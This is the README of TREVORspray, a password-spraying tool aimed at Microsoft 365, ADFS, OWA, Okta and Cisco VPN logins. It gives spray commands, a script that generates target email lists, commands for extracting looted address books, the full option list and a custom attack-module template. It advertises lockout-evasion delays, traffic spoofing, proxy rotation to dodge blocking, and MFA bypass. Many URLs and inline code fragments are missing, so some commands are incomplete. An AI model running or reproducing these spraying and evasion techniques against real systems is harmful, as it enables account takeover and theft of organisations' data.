TREVORspray is a modular password sprayer with threading, SSH proxying, loot modules, and more!
pip install git+
pip install git+
See the accompanying Blog Post for a fun rant and some cool demos!
- Threads, lots of threads
- Multiple modules
(Office 365)adfs
(Active Directory Federation Services)owa
(Outlook Web App)okta
(Okta SSO)anyconnect
(Cisco VPN)- custom modules (easy to make!)
- Tells you the status of each account: if it exists, is locked, has MFA enabled, etc.
- Automatic cancel/resume (remembers already-tried user/pass combos in
) - Round-robin proxy through multiple IPs with
- Automatic infinite reconnect/retry if a proxy goes down (or if you lose internet)
- Spoofs
and other signatures to look like legitimate auth traffic - Comprehensive logging
- Optional
, and--lockout-delay
between requests to bypass lockout countermeasures - IPv6 support
- O365 MFA bypass support (disable with
- EWS (Exchange Web Services) - Automatically retrieves GAL (Global Address Book)
- EAS (Exchange ActiveSync)
- Recommended bypass: BlueMail Android app
- EXO (Exchange Online PowerShell)
- UM (Exchange Unified Messaging)
- AutoDiscover - Automatically retrieves OAB (Offline Address Book)
- Azure Portal Access
- Domain
with the following features:- list MX/TXT records
- list O365 info
- tenant ID
- tenant name
- other tentant domains
- sharepoint URL
- authentication urls, autodiscover, federation config, etc.
- User enumeration (use
Azure Seamless SSO
- First, get a list of emails for
and perform a spray to see if the default configuration works. Usually it does. - If TREVORspray says the emails in your list don't exist, don't give up. Get the
. Thetoken_endpoint
is the URL you'll be spraying against (with the--url
option). - It may take some experimentation before you find the right combination of
+ email format.- For example, if you're attacking
, it may not be as easy as
. You may find that Corp's parent company Evilcorp owns their Azure tenant, meaning that you need to spray
. Also, you may find
's internal domaincorp.local
is used instead
. - So in the end, instead of spraying
, you're sprayingbob@corp.local
- For example, if you're attacking
trevorspray --recon
"token_endpoint": ""
trevorspray --recon -u emails.txt --threads 10
trevorspray -u emails.txt -p 'Welcome123' --url
trevorspray -u -p 'Welcome123' --delay 5
trevorspray -u emails.txt -p 'Welcome123' --ssh root@ root@
# clone wordsmith dataset
wget && tar -xvf data.tar.xz && cd data
# order first initial by occurrence
# loop through first initials
echo -n $ordered_letters | while read -n1 f; do
# loop through top 2000 USA last names
head -n 2000 'usa/lnames.txt' | while read last; do
# generate emails in f.last format
echo "${f}.${last}"
done | tee f.last.txt
trevorspray -u f.last.txt -p 'Welcome123'
When TREVORspray successfully bypasses MFA and retrieves an Offline Address Book (OAB), the address book is downloaded in LZX format to ~/.trevorspray/loot
. LZX is an ancient and obnoxious compression algorithm used by Microsoft.
# get libmspack (for extracting LZX file)
git clone
cd libmspack/libmspack/
# extract LZX file
./examples/.libs/oabextract ~/.trevorspray/loot/deadbeef-ce01-4ec9-9d08-1050bdc41131-data-1.lzx oab.bin
# extract all strings
strings oab.bin
# extract and dedupe emails
egrep -oa '[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,6}' oab.bin | tr '[:upper:]' '[:lower:]' | sort -u
$ trevorspray --help
usage: trevorspray [-h] [-m {owa,okta,anyconnect,adfs,msol}] [-u USERS [USERS ...]] [-p PASSWORDS [PASSWORDS ...]] [--url URL] [-r DOMAIN] [-t THREADS] [-f] [-d DELAY]
[-ld LOCKOUT_DELAY] [-j JITTER] [-e] [-nl] [--ignore-lockouts] [--timeout TIMEOUT] [--random-useragent] [-6] [--proxy PROXY] [-v] [-s USER@SERVER [USER@SERVER ...]]
[-i KEY] [-b BASE_PORT] [-n] [--interface INTERFACE] [--subnet SUBNET]
A password sprayer with the option to load-balance traffic through SSH hosts
optional arguments:
-h, --help show this help message and exit
basic arguments:
-m {owa,okta,anyconnect,adfs,msol}, --module {owa,okta,anyconnect,adfs,msol}
Spray module to use (default: msol)
-u USERS [USERS ...], --users USERS [USERS ...]
Usernames(s) and/or file(s) containing usernames
Password(s) that will be used to perform the password spray
--url URL The URL to spray against
-r DOMAIN, --recon DOMAIN, --enumerate DOMAIN
Retrieves MX records and info related to authentication, email, Azure, Microsoft 365, etc. If --usernames are specified, this also enables username enumeration.
advanced arguments:
Round-robin traffic through remote systems via SSH (overrides --threads)
-t THREADS, --threads THREADS
Max number of concurrent requests (default: 1)
-f, --force Try all usernames/passwords even if they've been tried before
-d DELAY, --delay DELAY
Sleep for this many seconds between requests
-ld LOCKOUT_DELAY, --lockout-delay LOCKOUT_DELAY
Sleep for this many additional seconds when a lockout is encountered
-j JITTER, --jitter JITTER
Add a random delay of up to this many seconds between requests
-e, --exit-on-success
Stop spray when a valid cred is found
-nl, --no-loot Don't execute loot activites for valid accounts
--ignore-lockouts Forces the spray to continue and not stop when multiple account lockouts are detected
--timeout TIMEOUT Connection timeout in seconds (default: 10)
--random-useragent Add a random value to the User-Agent for each request
-6, --prefer-ipv6 Prefer IPv6 over IPv4
--proxy PROXY Proxy to use for HTTP and HTTPS requests
-v, --verbose, --debug
Show which proxy is being used for each request
SSH Proxy:
Round-robin traffic through remote systems via SSH (overrides --threads)
Round-robin load-balance through these SSH hosts (user@host) NOTE: Current IP address is also used once per round
-i KEY, -k KEY, --key KEY
Use this SSH key when connecting to proxy hosts
-b BASE_PORT, --base-port BASE_PORT
Base listening port to use for SOCKS proxies
-n, --no-current-ip Don't spray from the current IP, only use SSH proxies
Subnet Proxy:
Send traffic from random addresses within IP subnet
--interface INTERFACE
Interface to send packets on
--subnet SUBNET Subnet to send packets from
If you need to spray a service/endpoint that's not supported yet, you can write your own spray module! This is a great option because custom modules benefit from all of TREVORspray's features -- e.g. proxies, delay, jitter, etc.
Writing your own spray module is pretty straightforward. Create a new .py
file in lib/sprayers
(e.g. lib/sprayers/
), and create a class that inherits from BaseSprayModule
. You can call the class whatever you want. Fill out the HTTP method and any other parameters that you need in the requests (you can reference lib/sprayers/
or any of the other modules for examples).
- You only need to implement one method on your custom class:
. This method evaluates the HTTP response to determine whether the login was successful. - Once you're finished, you can use the custom spray module by specifying the name of your python file (without the
) on the command line, e.g.trevorspray -m custom_sprayer -u users.txt -p Welcome123
# Example spray module
from .base import BaseSprayModule
class SprayModule(BaseSprayModule):
# HTTP method
method = 'POST'
# default target URL
default_url = ''
# body of request
request_data = 'user={username}&pass={password}&group={otherthing}'
# HTTP headers
headers = {}
# HTTP cookies
cookies = {}
# Don't count nonexistent accounts as failed logons
fail_nonexistent = False
headers = {
'User-Agent': 'Your Moms Smart Vibrator',
def initialize(self):
Get additional arguments from user at runtime
NOTE: These can also be passed via environment variables beginning with "TREVOR_":
while not self.trevor.runtimeparams.get('otherthing', ''):
'otherthing': input("What's that other thing? ")
return True
def check_response(self, response):
returns (valid, exists, locked, msg)
valid = False
exists = None
locked = None
msg = ''
if getattr(response, 'status_code', 0) == 200:
valid = True
exists = True
msg = 'Valid cred'
return (valid, exists, locked, msg)
- @dafthack for writing MSOLSpray
- @Mrtn9 for his Python port of MSOLSpray
- @KnappySqwurl for being a splunk wizard
- @CarsonSallis for the O365 MFA bypasses
- @DrAzureAD for the Azure AD recon features (AADInternals)
- @nyxgeek for the OneDrive user enumeration (onedrive_user_enum)
- @gremwell for the Seamless SSO user enumeration (o365enum)